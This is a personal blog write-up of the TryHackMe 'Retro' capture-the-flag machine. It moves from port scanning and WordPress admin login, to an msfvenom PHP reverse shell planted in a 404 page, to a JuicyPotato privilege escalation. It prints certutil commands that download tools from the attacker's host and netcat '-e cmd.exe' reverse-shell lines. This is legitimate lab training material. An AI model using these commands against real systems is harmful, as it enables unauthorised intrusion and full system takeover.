Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Retro

Writeup about the Tryhackme machine Retro.

0 - Basic info

Unknown machine, black box

1 - Reconnaissance and enumeration

nmap -p- --open -T5 -v 10.10.πŸ˜„ -n -Pn -oG ports.txt                                                                                                                                                                              1 β¨―
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-14 19:56 CEST
Initiating Connect Scan at 19:56
Scanning 10.10.πŸ˜„ [65535 ports]
Discovered open port 3389/tcp on 10.10.πŸ˜„
Discovered open port 80/tcp on 10.10.πŸ˜„
Connect Scan Timing: About 23.38% done; ETC: 19:58 (0:01:42 remaining)
Connect Scan Timing: About 63.55% done; ETC: 19:58 (0:00:35 remaining)
Completed Connect Scan at 19:58, 97.12s elapsed (65535 total ports)
Nmap scan report for 10.10.πŸ˜„
Host is up (0.039s latency).
Not shown: 65533 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
80/tcp   open  http
3389/tcp open  ms-wbt-server

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 97.31 seconds

Port 80,3389 open. Port 80 with IIS

Enumerating port 80 with gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.πŸ˜„      
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://10.10.πŸ˜„
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/07/14 19:57:37 Starting gobuvster in directory enumeration mode
/retro                (Status: 301) [Size: 149] [--> http://10.10.πŸ˜„/retro/]
/Retro                (Status: 301) [Size: 149] [--> http://10.10.πŸ˜„/Retro/]

on the url path /retro there is a retro game museum:

alt text

There is a spicy link to upload images, but caution it is not the retro machine.

alt text

Also it is running a wordpress: http://10.10.πŸ˜„/retro/wp-login.php

alt text

2 - Vulnerability Identification

Wade is a legit user:

alt text

Also this looks like a password…

alt text

Worked so I got a valid login to the wordpress admin panel:

alt text

Checking for more users:

alt text


3 - Exploit

Like always I got access to a wordpres admin panel, I try to make the reverse shell/webshell on the 404 page:

I used a msfvenom to generate a php reverse shell

msfvenom -a php --platform php -p php/reverse_php LHOST=10.10.πŸ˜„ LPORT=8080 -o shell.php
No encoder specified, outputting raw payload
Payload size: 3040 bytes
Saved as: shell.php

I placed the code on the 404.php page, using a obvious missing url path to trigger the shell:


Worked so I got the reverse shell.

rlwrap -r nc -lvp 8080
listening on [any] 8080 ...
10.10.πŸ˜„: inverse host lookup failed: Unknown host
connect to [10.10.πŸ˜„] from (UNKNOWN) [10.10.πŸ˜„] 50481

4 - Post-Exploitation and privilege eescalation

Now it is time to get root. After some time enumerating I found this:

whoami /all

User Name         SID                                                            
================= ===============================================================
iis apppool\retro S-1-5-82-3788814120-2795558051-4026253505-1810414383-1644260341


Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

ERROR: Unable to get user claims information.

SeImpersonatePrivilege        Impersonate a client after authentication Enabled 

Looks like it is vulnerable to juicy potato:


Setting up the executables needed and downloading the executables Nc, juicypotato and a bat script to trigger the nc reverse shell with the windows exploit:

certutil.exe -urlcache -f http://10.10.πŸ˜„:7777/JuicyPotato.exe C:\Windows\Temp\JuicyPotato.exe
certutil.exe -urlcache -f http://10.10.πŸ˜„:7777/nc64.exe C:\Windows\Temp\nc.exe
certutil.exe -urlcache -f http://10.10.πŸ˜„:7777/bat.bat C:\Windows\Temp\bat.bat
C:\Windows\Temp\nc.exe 10.10.πŸ˜„ -e cmd.exe 10.10.πŸ˜„ 1337

The bat script contains a simple nc reverse shell

C:\Windows\Temp\nc.exe 10.10.πŸ˜„ -e cmd.exe 10.10.πŸ˜„ 443

It is required to have a proper CLSID, I used one by default:


XblGameSave {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 
C:\Windows\Temp\JuicyPotato.exe -p C:\Windows\Temp\bat.bat -l 1337 -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
[+] authresult 0

[+] CreateProcessWithTokenW OK

Listening on my machine:

rlwrap -r nc -lvp 443                                                                                                                                                                 

Finally rooted and taking the flags:

 Directory of C:\Users\Administrator\Desktop

12/08/2019  09:06 PM    <DIR>          .
12/08/2019  09:06 PM    <DIR>          ..
12/08/2019  09:08 PM                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,402,187,264 bytes free

type root.txt.txt
type root.txt.txt

 Directory of C:\Users\Wade\Desktop

12/08/2019  09:09 PM    <DIR>          .
12/08/2019  09:09 PM    <DIR>          ..
12/08/2019  09:09 PM                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,402,187,264 bytes free

type user.txt.txt
type user.txt.txt

Thanks for reading!